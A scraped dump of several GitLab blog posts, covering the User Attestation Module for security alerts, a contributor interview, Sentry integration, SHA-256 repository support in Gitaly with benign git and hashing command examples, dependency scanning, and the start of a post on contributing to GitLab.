To test out building a more overarching software supply chain security strategy, try GitLab Ultimate for free with a [30-day trial today](/free-trial/).\n",[685,865,9,184],{"slug":4656,"featured":6,"template":689},"securing-the-software-supply-chain-through-automated-attestation","content:en-us:blog:securing-the-software-supply-chain-through-automated-attestation.yml","Securing The Software Supply Chain Through Automated Attestation","en-us/blog/securing-the-software-supply-chain-through-automated-attestation.yml","en-us/blog/securing-the-software-supply-chain-through-automated-attestation",{"_path":4662,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4663,"content":4669,"config":4676,"_id":4678,"_type":14,"title":4679,"_source":16,"_file":4680,"_stem":4681,"_extension":19},"/en-us/blog/self-service-security-alert-handling-with-gitlabs-uam",{"title":4664,"description":4665,"ogTitle":4664,"ogDescription":4665,"noIndex":6,"ogImage":4666,"ogUrl":4667,"ogSiteName":673,"ogType":674,"canonicalUrls":4667,"schema":4668},"Self-service security alert handling with GitLab's UAM","The User Attestation Module automates security alerts by routing them directly to team members for verification, reducing manual SecOps work and enhancing audit trails.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749662080/Blog/Hero%20Images/AdobeStock_1097303277.jpg","https://about.gitlab.com/blog/self-service-security-alert-handling-with-gitlabs-uam","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Self-service security alert handling with GitLab's UAM\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bala Allam\"},{\"@type\":\"Person\",\"name\":\"Matt Coons\"}],\n        \"datePublished\": \"2025-03-18\",\n      }",{"title":4664,"description":4665,"authors":4670,"heroImage":4666,"date":4673,"body":4674,"category":865,"tags":4675},[4671,4672],"Bala Allam","Matt Coons","2025-03-18","The 
[GitLab Security Operations team](https://handbook.gitlab.com/handbook/security/security-operations/) prioritizes automation that enables security engineers to focus on high-impact work rather than routine tasks that can be automated. A key innovation in this automation strategy is creation of the User Attestation Module (UAM), which allows GitLab team members to directly respond to and verify security alerts flagged as potentially malicious. When the [GUARD framework](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/) detects suspicious activity, it routes the alert to the relevant team member for review. The team member can then attest whether they recognize and authorize the activity. Their response is recorded for audit purposes, and, based on their input, the system either closes the alert or escalates it to the Security Incident Response Team (SIRT).\n\nIn this article, you'll learn about the UAM and how it can benefit your DevSecOps environment.\n\n## How the User Attestation Module works\n\nThe UAM streamlines security alert handling through a comprehensive workflow that includes:\n\n* Alert verification by team members  \n* Collection and documentation of supporting evidence  \n* Option to request additional support from GitLab SecOps  \n* Secure storage of team member responses  \n* Automated alert resolution or incident escalation  \n* Team member feedback collection for continuous improvement\n\nWe created UAM to help us: \n\n1. Route low priority alerts (such as administrative activities) to the relevant team members who performed them.  \n2. Reduce alert fatigue by first checking with the team member who completed the activity before routing to SIRT if necessary.   \n3. Collect and store team member responses to maintain an audit trail and rich metrics.   \n4. 
Create a response tier between **SIRT needs to triage this alert** and **This is an informational signal that does not need to be reviewed directly**.\n\n## UAM's design principles\n\nThe UAM is a Slack-first automation that reaches out to team members to validate activity directly in Slack, reducing effort and increasing participation. Today, 40% of all security alerts are delivered to team members through the UAM, saving SIRT valuable time to focus on higher importance alerts and incidents. \n\nA robust escalation workflow in the UAM ensures that all alerts are validated by team members or escalated to SIRT. When a UAM alert reaches a team member, they have a period of time to respond attesting to the activity or stating they do not recognize the activity. If no response is recorded, the UAM alert is auto-escalated to SIRT for handling. \n\nComprehensive metrics collection is a core GUARD design principle, which extends to how we designed UAM. All user interactivity with triggered UAM alerts is logged in a metrics database, which enables comprehensive measurement to identify problematic alerts, opportunities for process improvement, and overall UAM health.\n\nUAM enables a third alert tier, bridging the gap between alerts that always needed to be investigated, and lower importance informational signals that are grouped by entity for escalation and correlation. 
\n\n- Stable alerts (must be triaged and investigated by SIRT)  \n- UAM alerts (routed to team members to attest to the activity)  \n- Informational signal (low-importance events that are interesting and correlated by entity grouping)\n\n## UAM components \n\nThe UAM framework consists of multiple components:\n\n- GitLab: Fetches a user email address based on user_id via user’s API and stores user's responses  - Slack: Searches each user by email using Slack API and posts a UAM notification to the end user as well as collects responses from users using Slack modals  \n- Tines: Processes and orchestrates user responses and alerts     \n- Devo: Receives alert payload and alert notifications  \n- Metrics DB: Records metrics for triggered UAM alerts\n\nThe workflow integrates with following modules:\n\n- GitLab API for user identification  \n- Slack API for user communication  \n- Webhook configuration for alert reception  \n- Audit trail storage in GitLab\n\n## UAM workflow\n\nThe diagram below illustrates the workflow of the UAM module:\n\n![UAM - flow chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749674678/Blog/Content%20Images/UAM_detection_edited.png)\n\n## Following along with GUARD\n\nWe are still unveiling parts of GUARD and how it works, so [follow along](https://gitlab.com/gitlab-security-oss/guard) to learn how we automate our security detections from end to end.\n\n## Read more about the GUARD framework\n\n- [Unveiling the GUARD framework to automate security detections at GitLab](https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/)  \n- [Automating cybersecurity threat detections with GitLab CI/CD](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/)\n- [Open Source Security at 
GitLab](https://about.gitlab.com/security/open-source-resources/)",[865,752,482,1495,9],{"slug":4677,"featured":6,"template":689},"self-service-security-alert-handling-with-gitlabs-uam","content:en-us:blog:self-service-security-alert-handling-with-gitlabs-uam.yml","Self Service Security Alert Handling With Gitlabs Uam","en-us/blog/self-service-security-alert-handling-with-gitlabs-uam.yml","en-us/blog/self-service-security-alert-handling-with-gitlabs-uam",{"_path":4683,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4684,"content":4689,"config":4694,"_id":4696,"_type":14,"title":4697,"_source":16,"_file":4698,"_stem":4699,"_extension":19},"/en-us/blog/semyon-pupkov-contributor-post",{"title":4685,"description":4686,"ogTitle":4685,"ogDescription":4686,"noIndex":6,"ogImage":1192,"ogUrl":4687,"ogSiteName":673,"ogType":674,"canonicalUrls":4687,"schema":4688},"GitLab Code Contributor: Semyon Pupkov","Long-time contributor Semyon Pupkov shares why he loves contributing to GitLab.","https://about.gitlab.com/blog/semyon-pupkov-contributor-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Semyon Pupkov\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-01-30\",\n      }",{"title":4685,"description":4686,"authors":4690,"heroImage":1192,"date":4691,"body":4692,"category":10,"tags":4693},[704],"2019-01-30","\n\nFor this month's contributor post, I'm excited to introduce [Semyon Pupkov](https://gitlab.com/artofhuman), who's been a consistent contributor to GitLab since 2016. The graph below shows Semyon's merge requests (MRs) since GitLab 8.13. 
Let's get to know him!\n\n![Semyon's MRs](https://about.gitlab.com/images/blogimages/semyon-blogpost/semyon-mrs.png){: .small.center}\n\n### Can you tell us where you live and a little bit about your area?\n\nI live in a city called [Yekaterinburg](https://www.google.com/maps/place/Yekaterinburg,+Sverdlovsk+Oblast,+Russia/@56.8138122,60.5145089,11z) in the Ural region of Russia. I love the nature here as it's not too hot in the summer and you will find good snow in the winter for snow boarding.\n\n### When did you first contribute to GitLab and why did you decide to contribute?\n\n[My first MR](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/6762) about two years ago was a pretty simple one as I removed unnecessary code from tests. I used GitLab Community Edition for my private projects and since I like open source software, I decided to look at the GitLab code base. When I found some areas for improvement mainly in tests, I decided to create my first MR.\n\n### Which areas of GitLab product have you been contributing to over the past two years?\n\nMost of my contributions have been on the backend side where I tried to improve the existing code base.\n\n### Can you tell us what you do professionally?\n\nI am a backend Ruby/Python developer and work at a company called [SKB Kontur](https://kontur.ru/eng/about).\n\n### What do you enjoy doing when you're not working?\n\nI have been a father for about six months, and I try to give as much of my free time to my daughter. I also like playing games on PlayStation 4 and my favorite game right now is FIFA 19. And of course, I like to contribute to open source projects.\n\n![Semyon's family](https://about.gitlab.com/images/blogimages/semyon-blogpost/semyon-family.JPG){: .shadow.small.center}\n\n### What can we do better to help GitLab community contributors?\n\nSometimes in issues/MRs, I find links to Zendesk tickets or Slack discussions that are private, and this can be frustrating for someone not working at GitLab. 
Also, it would be great if GitLab had a better setup for local development with Docker and Docker Compose. I found the branch in the [GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit) repository with [support for Docker Compose](https://gitlab.com/gitlab-org/gitlab-development-kit/tree/docker-compose), but it probably needs some updating. I recently submitted an [MR to help address this](https://gitlab.com/gitlab-org/gitlab-development-kit/merge_requests/592).\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nJust don't be afraid to get started. If you find places in the code that can be improved, you should make a contribution and in most cases your code will be welcomed and accepted.\n\nContributing to GitLab also allows you to work with a strong professional team. It's a good way to improve your skills while working on a great product.\n\n### Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":4695,"featured":6,"template":689},"semyon-pupkov-contributor-post","content:en-us:blog:semyon-pupkov-contributor-post.yml","Semyon Pupkov Contributor 
Post","en-us/blog/semyon-pupkov-contributor-post.yml","en-us/blog/semyon-pupkov-contributor-post",{"_path":4701,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4702,"content":4708,"config":4715,"_id":4717,"_type":14,"title":4718,"_source":16,"_file":4719,"_stem":4720,"_extension":19},"/en-us/blog/sentry-integration-blog-post",{"title":4703,"description":4704,"ogTitle":4703,"ogDescription":4704,"noIndex":6,"ogImage":4705,"ogUrl":4706,"ogSiteName":673,"ogType":674,"canonicalUrls":4706,"schema":4707},"Sentry's GitLab integration streamlines error remediation","Your code has bugs, my code has bugs, everyone’s code has bugs (probably). Let’s fix that.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679964/Blog/Hero%20Images/sentry-io-blog.jpg","https://about.gitlab.com/blog/sentry-integration-blog-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Streamline and shorten error remediation with Sentry’s new GitLab integration\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Eva Sasson\"}],\n        \"datePublished\": \"2019-01-25\",\n      }",{"title":4709,"description":4704,"authors":4710,"heroImage":4705,"date":4712,"body":4713,"category":10,"tags":4714},"Streamline and shorten error remediation with Sentry’s new GitLab integration",[4711],"Eva Sasson","2019-01-25","\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/KUHk1uuXWhA?rel=0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nSentry is open source error tracking that gives visibility across your entire stack and provides the details you need to fix bugs, ASAP. 
Because the only thing better than visibility and details is more visibility and details, Sentry improved their [GitLab integration](https://docs.sentry.io/workflow/integrations/global-integrations/gitlab/?utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM) by adding [release](https://docs.sentry.io/workflow/releases/?platform=browser&utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM) and [commit](https://docs.sentry.io/workflow/releases/?platform=browser&utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM#link-repository) tracking as well as [suspect commits](https://docs.sentry.io/workflow/releases/?platform=browser&utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM#after-linking-a-repository).\n\n### Streamline your workflow with issue management and creation\n\nWhen you receive an alert about an error, the last thing you want to do is to jump around 20 different tools trying to find out exactly what happened and where. Developers with both Sentry and GitLab in their application lifecycle benefit from issue management and issue creation to their GitLab accounts directly in the Sentry UI, alleviating some of the hassle of back-and-forth tool toggling.\n\n![GitLab account in Sentry](https://about.gitlab.com/images/blogimages/sentry/gitlab-sentry-integration.png){: .shadow.large.center}\n\nOf course, less tool jumping results in a more streamlined triaging process and shortened time to issue resolution – something that benefits the whole team.\n\n![Creating GitLab issue](https://about.gitlab.com/images/blogimages/sentry/create-gitlab-issue.png){: .shadow.medium.center}\n\nHave a GitLab issue that wasn’t created in Sentry? No problem. 
Existing issues are also easily linked.\n\n![Import GitLab issue](https://about.gitlab.com/images/blogimages/sentry/import-gitlab-issue.png){: .shadow.medium.center}\n\n### Find and fix bugs faster with release and commit tracking\n\nWhy stop at streamlining the triaging process, when we can also make issue resolution more efficient? Sentry’s GitLab integration now utilizes GitLab commits to find and fix bugs faster.\n\nWith the newly added release and commit tracking, an enhanced release overview page uncovers new and resolved issues, files changed, and authors. Developers can also resolve issues via commit messages or merge requests, see suggested assignees for issues, and receive detailed deploy emails.\n\nWant a big flashing arrow that points to an error’s root cause? Sentry’s suspect commits feature exposes the commit that likely introduced an error as well as the developer who wrote the broken code.\n\n![Suspect commits feature](https://about.gitlab.com/images/blogimages/sentry/suspect-commits-feature.png){: .shadow.medium.center}\n\nKeep in mind that this feature is available for Sentry users on “Teams” plans and above.\n{: .note}\n\nCheck out [Sentry’s GitLab integration documentation](https://docs.sentry.io/workflow/integrations/global-integrations/gitlab/?utm_source=GitLab&utm_medium=blog&utm_campaign=GitLab_GTM) to get started.\n\n### What’s next?\n\nAgain, why stop there, when we can do even more? GitLab is currently working to bring Sentry into the GitLab interface. Soon, GitLab and Sentry users will see their Sentry errors listed in their GitLab projects. 
Read the documentation on [the integration here](https://docs.gitlab.com/ee/operations/error_tracking.html).\n\n### About the guest author\n\nEva Sasson is a Product Marketer at [Sentry.io](https://sentry.io/welcome/), an open source error-tracking tool that gives developers the contextual information they need to resolve issues quickly, and integrates with the other development tools across the stack.\n",[109,779,685,231,9,865,953,910,686],{"slug":4716,"featured":6,"template":689},"sentry-integration-blog-post","content:en-us:blog:sentry-integration-blog-post.yml","Sentry Integration Blog Post","en-us/blog/sentry-integration-blog-post.yml","en-us/blog/sentry-integration-blog-post",{"_path":4722,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4723,"content":4728,"config":4733,"_id":4735,"_type":14,"title":4736,"_source":16,"_file":4737,"_stem":4738,"_extension":19},"/en-us/blog/sha256-support-in-gitaly",{"title":4724,"description":4725,"ogTitle":4724,"ogDescription":4725,"noIndex":6,"ogImage":1487,"ogUrl":4726,"ogSiteName":673,"ogType":674,"canonicalUrls":4726,"schema":4727},"GitLab Gitaly project now supports the SHA 256 hashing algorithm","Gitaly now supports SHA-256 repositories. Here's why it matters.","https://about.gitlab.com/blog/sha256-support-in-gitaly","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Gitaly project now supports the SHA 256 hashing algorithm\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"John Cai\"}],\n        \"datePublished\": \"2023-08-28\",\n      }",{"title":4724,"description":4725,"authors":4729,"heroImage":1487,"date":4730,"body":4731,"category":930,"tags":4732},[1512],"2023-08-28","\nWe've taken a huge step in SHA-256 support in GitLab: The [Gitaly](https://gitlab.com/gitlab-org/gitaly) project now fully supports SHA-256 repositories. 
While there is [still some work](https://gitlab.com/groups/gitlab-org/-/epics/10981) we need to do in other parts of the GitLab application before SHA-256 repositories can be used, this milestone is important.\n\n## What is SHA-256?\nSHA-256 is a [hashing algorithm](https://about.gitlab.com/handbook/security/cryptographic-standard.html#algorithmic-standards). Given an input of data, it produces a fixed-length hash of 64 characters with hexadecimal digits. Git uses hashing algorithms to generate IDs for commits and other Git objects such as blobs,\ntrees, and tags.\n\nGit uses the SHA-1 algorithm by default. If you've ever used Git, you know that\ncommit IDs are a bunch of hexademical digits. A `git log` command yields\nsomething like the following:\n\n```\ncommit bcd64dba39c90daee2e1e8d9015809b992174e34 (HEAD -> main, origin/main, origin/HEAD)\nAuthor: John Cai \u003Cjcai@gitlab.com>\nDate:   Wed Jul 26 13:41:34 2023 -0400\n\n    Fix README.md\n```\n\nThe `bcd64dba39c90daee2e1e8d9015809b992174e34` is the ID of the commit and is a\n40-character hash generated by using the SHA-1 hashing algorithm.\n\nIn SHA-256 repositories, everything is the same except, instead of a 40-character\nID, it's now a 64-character ID:\n\n```\ncommit e60501431d52f6d06b4749cf205b0dd09141ea0b3155a45b9246df24eee9b97b (HEAD -> master)\nAuthor: John Cai \u003Cjcai@gitlab.com>\nDate:   Fri Jul 7 12:56:52 2023 -0400\n\n    Fix README.md\n```\n\n### Why SHA-256?\nSHA-1, which has been the algorithm that has been used until now in Git, is\ninsecure. In 2017, [Google was able to produce a hash collision](https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html). 
While the Git project is not yet impacted by these kinds of attacks due to the\nway it stores objects, it is only a matter of time until new attacks on SHA-1\nwill be found that would also impact Git.\n\nFederal regulations such as NIST and CISA [guidelines](https://csrc.nist.gov/projects/hash-functions/nist-policy-on-hash-functions),\nwhich [FedRamp](https://www.fedramp.gov/) enforces, set a due date in 2030 to\nstop using SHA-1, and encourage agencies to move away from it sooner if\npossible.\n\nIn addition, SHA-256 has been labeled experimental in the Git project for a long time,\nbut as of Git 2.42.0, the project has decided to [remove the experimental label](https://github.com/git/git/blob/master/Documentation/RelNotes/2.42.0.txt#L41-L45).\n\n### What does this mean for developers?\nFrom a usability perspective, SHA-256 and SHA-1 repositories really don't have a\nsignificant difference. For personal projects, SHA-1 is probably fine. However,\ncompanies and organizations are likely to switch to using SHA-256 repositories\nfor security reasons.\n\n### See SHA-256 in action\nIf you have `sha256sum(1)` installed, you can generate such a hash on the command line:\n\n```\n> printf '%s' \"please hash this data\" | sha256sum\n62f73749b40cc70f453320e1ffc37e405ba50474b5db68ad436e64b61fbb8cf0  -\n```\n\nWe can also see this in action in a Git repository. Let's create a repository,\nadd an initial commit, and inspect the contents of the commit object. 
**Note:** If\nyou try this yourself, the commit IDs will be different because the date of the\ncommit is part of the hash calculation.\n\n```\n> git init test-repo\n> cd test-repo\n> echo \"This is a README\" >README.md\n> git add .\n> git commit -m \"README\"\n[main (root-commit) 328b61f] README\n 1 file changed, 1 insertion(+)\n create mode 100644 README.md\n> zlib-flate -uncompress \u003C ./git/objects/32/8b61f2449205870f69b5981f58bd8cdbb22f95\ncommit 159tree 09303be712bd8e923f9b227c8522257fa32ca7dc\nauthor John Cai \u003Cjcai@gitlab.com> 1688748132 -0400\ncommitter John Cai \u003Cjcai@gitlab.com> 1688748132 -0400\n\nREADME\n```\n\nIn the last step, we uncompress the actual commit file on disk. Git zlib compresses object\nfiles before storing them on disk.\n\n`zlib-flate(1)` is a utility that comes packaed with `qpdf` that uncompresses zlib compressed files.\n\nNow, if we feed this data back into the SHA-1 algorithm, we get a predictable result:\n\n```\n> zlib-flate -uncompress \u003C .git/objects/32/8b61f2449205870f69b5981f58bd8cdbb22f95 | sha1sum\n328b61f2449205870f69b5981f58bd8cdbb22f95  -\n```\n\nAs we can see, the result of this is the commit ID.\n\nThe recommendation by NIST was to replace SHA-1 with SHA-2 or SHA-3. 
The\nGit project has [undergone this effort](https://git-scm.com/docs/hash-function-transition/),\nand the current state of the feature is that it's fully usable in Git and no\nlonger deemed experimental.\n\nIn fact, you can create and use repositories with SHA-256 as the hashing algorithm\nto see it in action on your local machine:\n\n```\n> git init --object-format=sha256 test-repo\n> cd test-repo\n> echo \"This is a README\" >README.md\n> git add .\n> git commit -m \"README\"\n[main (root-commit) e605014] README\n 1 file changed, 1 insertion(+)\n create mode 100644 README.md\n> git log\ncommit e60501431d52f6d06b4749cf205b0dd09141ea0b3155a45b9246df24eee9b97b (HEAD -> master)\nAuthor: John Cai \u003Cjcai@gitlab.com>\nDate:   Fri Jul 7 12:56:52 2023 -0400\n\n    README\n\n```\n\n",[751,930,9,267],{"slug":4734,"featured":91,"template":689},"sha256-support-in-gitaly","content:en-us:blog:sha256-support-in-gitaly.yml","Sha256 Support In Gitaly","en-us/blog/sha256-support-in-gitaly.yml","en-us/blog/sha256-support-in-gitaly",{"_path":4740,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4741,"content":4747,"config":4751,"_id":4753,"_type":14,"title":4754,"_source":16,"_file":4755,"_stem":4756,"_extension":19},"/en-us/blog/software-dependencies-tech-debt",{"title":4742,"description":4743,"ogTitle":4742,"ogDescription":4743,"noIndex":6,"ogImage":4744,"ogUrl":4745,"ogSiteName":673,"ogType":674,"canonicalUrls":4745,"schema":4746},"Don’t let your dependency-laden software become the next monolith","Keep your software development fast and efficient with dependency scanning and auto-remediation.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678488/Blog/Hero%20Images/software-dependencies-monolith.jpg","https://about.gitlab.com/blog/software-dependencies-tech-debt","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Don’t let your dependency-laden software become the next 
monolith\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Vanessa Wegner\"}],\n        \"datePublished\": \"2019-09-09\",\n      }",{"title":4742,"description":4743,"authors":4748,"heroImage":4744,"date":1217,"body":4749,"category":682,"tags":4750},[1916],"\nDependencies are a great tool for developers: They save time, which saves money\nand helps meet the need for speed when developing. But with great dependencies\ncomes great responsibility because it’s easy to accumulate tech debt in the form\nof dependencies. What happens when you need to alter a line of code? Does it\nbreak your software? What is the cost of fixing a bug, updating dependencies,\nor adding a new module? Suddenly your software management starts to resemble the\nstruggles of a monolithic architecture, where changing one small piece can break\neverything.\n\n## Software dependencies are like bricks, but flammable\n\nEach module added to your software can be thought of like a brick: Small parts\nof a greater whole. But now imagine that those bricks are highly flammable. You\nhave a significant chance of catastrophe with the tiniest of sparks.\n\nThat spark could be a single code change, [deleted code like the LeftPad\nincident](https://www.businessinsider.com/npm-left-pad-controversy-explained-2016-3),\na corrupted library, a missed patch, or patch that forces updates to all your\nother dependencies. There’s also the issue of security flaws – when a bug is\nfound, the whole open source community is in the know, and that applies to\nhackers as well. Popular dependencies [can quickly become targets](https://www.aptible.com/blog/vulnerability-scanning-for-your-dependencies-why-and-how)\nas soon as the news of a patch is released. 
Another common risk of all third-party software and code are [zero-day attacks](https://www.csoonline.com/article/3284084/what-is-a-zero-day-a-powerful-but-fragile-weapon.html),\nwhen a previously unknown vulnerability is exploited by hackers before a patch\nor update is applied.\n\n## Software dependency scanning: Your firetruck dispatch\n\nDependency scanners have risen in popularity and breadth in recent years,\nproving themselves useful tools for incident prevention. Scanners generally\nprovide a list of all the dependencies within your code or app, along with a\nlist of all the known vulnerabilities within each dependency. Scans can be done\nmanually or automatically. Users can [set up scans that run automatically within GitLab](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), which is helpful for code that\nisn’t updated often.\n\nDependency scanners can also be used to look for redundancies within projects\nthat have been worked on or updated without a detailed changelog, or over a\nlong period of time. Simplifying your dependencies will reduce the risk of a\ncode change chain reaction, and will also reduce your attack surface.\n\n## Auto-remediation: The all-in-one fire prevention and firehose tool\n\n[Auto-remediation tools](/direction/secure/#auto-remediation)\ncan find vulnerabilities within your code, evaluate the scope of any problems,\nand propose a solution. Developers can even set up auto-remediation tools to\napply solutions under defined circumstances, shortening the time the vulnerability window\nis open to cyber assailants. Once that fix is automatically created, next it is\ntested. 
If it passes all the tests defined for your application, the fix is then\ndeployed to production.\n\nAuto-remediation tools can also help verify that changes made in dependency\nupdates didn’t break any parts of your application – kind of like making sure\nyou’ve turned off the stove before leaving the house.\n\n## Build your house by laying each brick with intention\n\nDependencies help simplify coding, but they add complexity when it comes to\nmanaging the bigger picture. So it is crucial to understand what\ndependencies you have, where you can simplify, and how your current and new\ndependencies will affect your software in the future. Take command of your\ndependencies with tools like dependency scanners and auto-remediation, and use\nthat information and experience to build future software with efficiency and\nintention.\n\nCover photo by [Grace Kadiman](https://unsplash.com/@gracekadiman?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\non [Unsplash](https://unsplash.com/search/photos/brick-laying?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[9,865],{"slug":4752,"featured":6,"template":689},"software-dependencies-tech-debt","content:en-us:blog:software-dependencies-tech-debt.yml","Software Dependencies Tech Debt","en-us/blog/software-dependencies-tech-debt.yml","en-us/blog/software-dependencies-tech-debt",{"_path":4758,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4759,"content":4765,"config":4770,"_id":4772,"_type":14,"title":4773,"_source":16,"_file":4774,"_stem":4775,"_extension":19},"/en-us/blog/start-contributing-to-gitlab-today",{"title":4760,"description":4761,"ogTitle":4760,"ogDescription":4761,"noIndex":6,"ogImage":4762,"ogUrl":4763,"ogSiteName":673,"ogType":674,"canonicalUrls":4763,"schema":4764},"Start contributing to GitLab today","Learn how to start contributing to GitLab and how GitLab team members are here to 
help.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749676361/Blog/Hero%20Images/collaboration.jpg","https://about.gitlab.com/blog/start-contributing-to-gitlab-today","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Start contributing to GitLab today\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rémy Coutable\"}],\n        \"datePublished\": \"2020-09-30\",\n      }",{"title":4760,"description":4761,"authors":4766,"heroImage":4762,"date":2754,"body":4768,"category":951,"tags":4769},[4767],"Rémy Coutable","\n{::options parse_block_html=\"true\" /}\n\nAt GitLab, [everyone can contribute](https://about.gitlab.com/company/mission/#mission). This has been our mission from day\none, since GitLab started as --and is still-- an open-source project.\n\nWe believe that, when consumers become contributors, it benefits everyone: GitLab the product, GitLab the company, GitLab the community\nas well as all GitLab users all around the world.\n\nWe already merged more than 7,700 [“community contribution”](https://gitlab.com/groups/gitlab-org/-/merge_requests?label_name%5B%5D=Community+contribution&state=merged) merge requests from our wider community (at the `gitlab-org` group level).\n\n![Screenshot showing more than 7,700 merged community MRs](https://about.gitlab.com/images/blogimages/2020-09-30-community-contributions.png){: .shadow.medium.center}\n*\u003Csmall>Merge requests from community members not employed by GitLab (aka from the GitLab wider community)\u003C/small>*\n\n## Contributing tracks\n\nNow, it's your turn to contribute and improve GitLab! 
Since not everyone share the same interests nor competencies, we\nhave multiple tracks to ensure everyone can contribute:\n\n- [Development (new features, bug fixes, performance improvements)](/community/contribute/development/)\n- [Documentation addition, improvements, and fixes](/community/contribute/documentation/)\n- [Translations](/community/contribute/translation/)\n- [UX design](https://about.gitlab.com/community/contribute/ux-design/)\n- [Project templates](/community/contribute/project-templates/)\n\nWhen you're ready, simply choose the track for you and follow the instructions.\n\n## Start small...\n\nTo get familiar with the merge request workflow, I advise you start small.\n[Fixing a typo](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/42447) or\n[adding a comma](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/43021) in the documentation are small yet awesome\ncontributions that are usually merged in a matter of hours. These are awesome to gear up and get the ball rolling.\n\nFor more examples, be sure to take a look at the [community merge requests that touched GitLab documentation](https://gitlab.com/gitlab-org/gitlab/-/merge_requests?state=merged&label_name[]=documentation&label_name[]=Community%20contribution).\n\nThese kind of changes don't require a lot of time from you, but if you have more time and are ready to tackle bigger challenges,\nyou can start looking for [bugs](https://gitlab.com/gitlab-org/gitlab/-/issues?label_name%5B%5D=Accepting+merge+requests&label_name[]=type::bug&scope=all&sort=popularity&state=opened)\nor [feature proposals](https://gitlab.com/gitlab-org/gitlab/-/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=Accepting%20merge%20requests&label_name[]=feature).\n\n## ...and end up MVP\n\nEvery contribution is a collaborative effort between the merge request author, the reviewer(s), potentially MR coaches, and the maintainer (who gets to merge the MR).\n\nSome contributions are so complex and technical that 
they take months of collaboration to get accross the finish line!\n\nLet's give you a few examples of great collaborative efforts that happened in the last 12 months:\n\n1. [Cédric Tabin](https://gitlab.com/ctabin) worked for more than 9 months contributing\n   [a new CI job keyword allowing interruptible builds](/releases/2019/09/22/gitlab-12-3-released/#interruptible-keyword-to-indicate-if-a-job-can-be-safely-canceled)\n   and working with the GitLab teams to get it across the line. The [merge request](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/23464) involved 51 people, who posted 405 discussion notes!\n   This contribution was released in GitLab 12.3, and allows to save a lot of money by avoiding running redundant pipelines.\n1. [Tuomo Ala-Vannesluoma](https://gitlab.com/tuomoa) worked for 7 months adding support for\n   [previewing artifacts that are not public](/releases/2019/10/22/gitlab-12-4-released/#private-project-support-for-online-view-of-html-artifacts), a highly requested feature with almost 300 upvotes!\n   The [merge request](https://gitlab.com/gitlab-org/gitlab-pages/-/merge_requests/134) landed in GitLab 12.4, and received two 🍾 emoji votes.\n1. [Roger Meier](https://gitlab.com/bufferoverflow) worked for more than 4 months contributing\n   [support for S/MIME Signature Verification of Commits](/releases/2020/02/22/gitlab-12-8-released/#smime-signature-verification-of-commits), an important feature for sensitive projects and in regulated industries.\n   Roger's teammate, [Henning Schild](https://gitlab.com/henning-schild), contributed the change upstream to Git and Roger made the change in GitLab.\n   The [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/17773) involved 42 people, who posted 430 discussion notes, and landed in GitLab 12.8.\n1. 
